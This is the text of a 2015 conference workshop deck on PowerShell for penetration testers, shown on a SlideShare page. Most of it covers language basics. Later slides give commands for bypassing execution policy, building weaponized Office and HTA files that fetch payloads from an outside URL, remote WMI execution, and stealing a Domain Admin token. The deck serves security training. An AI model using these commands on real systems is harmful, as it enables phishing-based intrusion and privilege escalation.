SlideShare ist ein Scribd-Unternehmen logo

Workshop: PowerShell for Penetration Testers

Als PPTX, PDF herunterladen
Nikhil Mittal
Nikhil Mittal

Slides of the Workshop I gave at HITB, Amsterdam 2015

Technologie
1 von 53
PowerShell for Penetration Testers Nikhil Mittal
Get-Host • Hacker, Trainer, Speaker, Penetration Tester • Creator of Kautilya and Nishang. • Twitter: @nikhil_mitt • Blog – http://labofapenetrationtester.com • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous talks: Defcon, Blackhat, Troopers, DeepSec, EuSecwest, Hackfest, PHDays etc. 2PowerShell for Penetration Testers HITB
$PFPTLab = Get-Content • What is PowerShell • Why PowerShell • Executing commands, scripts and modules • Extended PowerShell usage • A Penetration Testing Scenario • Defenses 3PowerShell for Penetration Testers HITB
$PFPTLab | Format-Custom • This is a hands-on workshop, keep your Windows machines/VMs ready. • We will stick to PowerShell v2, unless specified otherwise. • For language basics, we will go with bare minimum to be able to cover interesting stuff in couple of hours. • The workshop assumes zero knowledge of PowerShell so if you know something: do {Start-Sleep –s 60} while {$SomethingNew –ne $true} 4PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “What is PowerShell"} • “Windows PowerShell® is a task-based command- line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en- us/library/bb978526.aspx 5PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Why PowerShell"} • Present by default on modern Windows OS. • Tightly integrated with Windows and allows interaction with .Net, Filesystem, Registry, API, Certificates, COM, native commands, network, domain etc. • Expandable with use of .Net framework. • Easy to learn. • Less dependency on *nix based tools. • Trusted by System Admins, Blue Teams and (mostly) AV etc. 6PowerShell for Penetration Testers HITB
Why PowerShell? PowerShell for Penetration Testers HITB 7 http://www.quickmeme.com/ONE-OF-US
about_PowerShell.exe • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 8PowerShell for Penetration Testers HITB
Invoke-HandsOn • Try running powershell.exe and Write-Output “Hello World” • Try usual bash and cmd commands. 9PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “powershell.exe"} • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 10PowerShell for Penetration Testers HITB
Get-Help Get-Help • Easy to use and very useful. • This is the first place to go for learning something new or looking for solution to a problem. • Detailed help for cmdlets, conceptual topics, scripts, functions and modules. • Supports wildcards. • You may need to run Update-Help (v3 onwards). 11PowerShell for Penetration Testers HITB
Get-Help Get-Help • Use with about_* to list help about a conceptual topic. • Various parameters could be passed to Get-Help Get-Help Get-Help –Full Get-Help Get-Command -Examples 12PowerShell for Penetration Testers HITB
$Exercise[0] 1. Use PowerShell help system to list everything available. 2. List help about “process”. 3. List help about powershell.exe conceptual topic. 13PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “cmdlets"} • A Cmdlet is pronounced as “command let”. • Cmdlets are task based compiled .Net classes. • Certainly one of the best features of PowerShell. • They follow a Verb-Noun naming convention. • Cmdlets have aliases. • Like every other command in PowerShell, cmdlets return objects. 14PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “cmdlets"} • Explore cmdlets Get-Command –CommandType Cmdlet • Explore cmdlets based on a verb Get-Command –Verb Get • Get-Command also supports wildcards. 15PowerShell for Penetration Testers HITB
Invoke-HandsOn • I need a count shout for number of Cmdlets you have on your machine. Get-Command –CommandType Cmdlet | Measure-Object • As you can see, PowerShell supports the pipe (|) operator as well. 16PowerShell for Penetration Testers HITB
$Exercise[1] 1. I need names of three cmdlets each from everyone which can be useful in Penetration Tests. 17PowerShell for Penetration Testers HITB
about_Windows_PowerShell_ISE • A GUI Scripting environment. • Tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features. • PowerShell scripts have .ps1 extension. 18PowerShell for Penetration Testers HITB
Invoke-HandsOn 1. Write a script which prints Hello World. 2. Save it and execute it. 19PowerShell for Penetration Testers HITB
about_Execution_Policies 20PowerShell for Penetration Testers HITB
about_Execution_Policies • Execution Policy is present to stop a user from accidently running scripts. • There are numerous ways to bypass it: powershell.exe –ExecutionPolicy bypass .script.ps1 powershell.exe –EncodedCommand <> powershell.exe –c <> Read: 15 ways to bypass PowerShell execution policy https://www.netspi.com/blog/entryid/238/15-ways-to- bypass-the-powershell-execution-policy 21PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Variables"} • Variables are declared in the form $varname. • Variables can hold outputs from Cmdlets, native commands, functions etc. as each one returns an object or array of objects. Examples: $DirList = Get-Childitem $UserList = & "net" "user" 22PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Types"} • PowerShell is not strictly typed. • You need not specify the Type of a variable. • If required, Type conversion could be done with the cast [] operator. 23PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Statements"} • Conditional Statements – If, else, elseif, Switch • Loop Statements – while() {}, do {} while(), do {} until(), for(;;){}, foreach ( in ){} – ForEach-Object 24PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Functions"} • Basic Declaration function <function_name> ( param1, param2) { do stuff } • Calling a function <function_name> <value1> <value2> • param statement provides advanced attributes for function parameters. 25PowerShell for Penetration Testers HITB
Invoke-HandsOn • Open Check-RegistryKey.ps1 26PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Basics of Modules"} • A simplest module is a PowerShell script with the extension .psm1 • Use Get-Module -ListAvailable to list modules. • Use Import-Module <modulepath>to import a module. • Use Get-Command –Module <Modulename> to list functions exported by a module. 27PowerShell for Penetration Testers HITB
$Exercise[2] 1. Convert the script Check-RegistryKey.ps1 to a script module. 2. Try importing the module and use its functions. 28PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Most powerful feature of PowerShell. Great to extend the existing capabilities of PowerShell. • Useful for loading .Net assemblies, using Windows API, using .Net code and classes in a PowerShell script. 29PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Exploring .Net classes $ProcClass = [AppDomain]::CurrentDomain.GetA ssemblies() | ForEach-Object {$_.GetTypes()}| where {$_.IsPublic -eq "True“} | where {$_.Name -eq “Process”} 30PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Static Methods $ProcClass | Get-Member –Static $ProcClass:: GetProcesses() 31PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Creating instance $WebClient = New-Object System.Net.WebClient $WebClient | Get-Member –MemberType Method $WebClient | Get-Member -Name DownloadString | Format-List * $WebClient.DownloadString("http://google.com") 32PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Use Add-Type to add .Net code/classes and Windows API to a PowerShell script or session. • See New-DotnetCode.ps1 for example of using .Net code. 33PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq WMI"} • WMI is a treasure trove for hackers. • PowerShell could be used to retrieve information from WMI as well execute commands and scripts. • Explore the cmdlets related to WMI Get-Command -CommandType Cmdlet – Name *wmi* 34PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq WMI"} • To run a PowerShll command using WMI use: Invoke-WmiMethod -Class win32_process -Name create - ArgumentList "powershell -c Get-Process" –ComputerName <> 35PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq COM"} • PowerShell can use COM Objects as well. • Limitless opportunities for automation! $ie = New-Object -ComObject internetexplorer.application $ie | Get-Member 36PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq PenTest Scenario"} • Lets consider a Pen Test scenario: – The Goal of Penetration Test is to get access to get Domain Administrator access (not a very good goal but lets target it for this lab . – Server side attacks have been largely unsuccessful. – Msf payloads are being detected by Anti Virus and other countermeasures. 37PowerShell for Penetration Testers HITB
$Exploitation = $PFPTLab | where- object {$_ -eq Exploitation"} • PowerShell is very useful in getting a foothold system in a target network. • The trust on PowerShell by system administrators and countermeasures like AV makes it an ideal tool for Exploitation. 38PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Client Side Attacks"} • PowerShell is an ideal tool for client side attacks on a Windows platform. • It could be used for generating weaponized files for email phishing campaigns and drive by download attacks. • Lets use Client Side attack scripts from Nishang (https://github.com/samratashok/nishang) 39PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Client Side Attacks"} • Generating weaponized MS Office Files Out-Word -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile - noexit -c Get-Process“ Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 Out-Excel -Payload "powershell.exe –EncodedCommand <>“ 40PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Client Side Attacks"} • Drive by download attacks Out-HTA -PayloadURL http://192.168.254.1/powerpreter.ps m1 -Arguments Check-VM • More weaponized files Out-CHM Out-Shortcut 41PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Shells"} • Now that we can run successful client side attacks, we may need shell level access for further attacks. • PowerShell can be used to write shells as well. • Shells in PowerShell can be used with exploits to get access to the target machine. 42PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Shells"} • Interactive PowerShell Shells from Nishang • Metasploit’s msfvenom - Meterpreter using PowerShell 43PowerShell for Penetration Testers HITB
$PostExp = $PFPTLab | where-object {$_ -eq Post Exploitation"} • PowerShell is arguably one of the best tools around for Windows Post Exploitation. • We have an interactive PowerShell session on one of the machines on the target and various PowerShell tools can be used now. 44PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq Domain Enumeration"} • We can use Powerview (https://github.com/Veil- Framework/PowerTools/tree/master/Power View) to enumerate the target domain. • The goal is to find a machine where a Domain Admin is logged in. 45PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq Domain Enumeration"} • To find machines which have a domain admin logged in and the current user has access to that machine: Invoke-UserHunter –CheckAccess –Domain <targetdomain> 46PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq Priv Escalation"} • Now we can use the Domain Admin token on the target machine using Invoke- TokenManipulation and some PowerShell hackery: Get-Process -id <DA process> | Invoke-TokenManipulation CreateProcess cmd.exe Invoke-TokenManipulation is a part of Powersploit (https://github.com/mattifestation/PowerSploit) 47PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Defenses"} • Log Log Log! • Monitor and Analyze the logs. • Understand flow/use of privileges and credentials in your environment. • If a determined attacker can break into any system, a determined system administrator can catch any attacker as well. 49PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Credits"} Credits/FF to PowerShell hackers (in no particular order) @obscuresec, @mattifestation, @JosephBialek, @Carlos_Perez, @Lee_Holmes, @ScriptingGuys, @BrucePayette, @dave_rel1k, @enigma0x3, @subTee, @harmj0y and other PowerShell bloggers and book writers. 50PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Closing Remarks"} • Bad guys are already using PowerShell, using it for security testing is imperative now. Both for red teams and blue teams. • PowerShell is the not the future of Windows Penetration Testing, it is the present. 51PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Self Promotion"} • Check out PowerShell for Penetration Testers two days trainings at: http://www.labofapenetrationtester.com/p/tr ainings.html#pfptschedule 52PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Feedback"} • Please fill the feedback form. • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 53PowerShell for Penetration Testers HITB

Empfohlen

Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellEnclaveSecurity
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 

Empfohlen

Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellEnclaveSecurity
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 
Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)ClubHack
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shellNikhil Mittal
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"Will Schroeder
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 
Pwnstaller
PwnstallerPwnstaller
PwnstallerWill Schroeder
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 

Weitere ähnliche Inhalte

Was ist angesagt?

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)ClubHack
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shellNikhil Mittal
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 

Was ist angesagt? (20)

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attack
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 

Andere mochten auch

Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 
Office 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenOffice 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenSébastien Levert
 
Practical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionPractical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionBen Ten (0xA)
 
PowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewPowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewRichard Giles
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)ÇözümPARK
 
Powershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubPowershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubEssam Salah
 
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Richard Calderon
 
PowerShell from *nix user perspective
PowerShell from *nix user perspectivePowerShell from *nix user perspective
PowerShell from *nix user perspectiveJuraj Michálek
 
Managing Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellManaging Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellguesta849bc8b
 
PowerShell 101
PowerShell 101PowerShell 101
PowerShell 101Thomas Lee
 
Getting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingGetting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingRavikanth Chaganti
 
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Puppet
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShellSalaudeen Rajack
 
Geek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerGeek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerIDERA Software
 
Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Ben Ten (0xA)
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShellCostin-Alin Neacsu
 
Practical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeoplePractical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeopleBen Ten (0xA)
 
PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!Thomas Lee
 

Andere mochten auch (20)

Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
Office 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenOffice 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heaven
 
Practical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionPractical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended Edition
 
PowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewPowerShell Plus v4.7 Overview
PowerShell Plus v4.7 Overview
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
 
Powershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubPowershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge Club
 
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
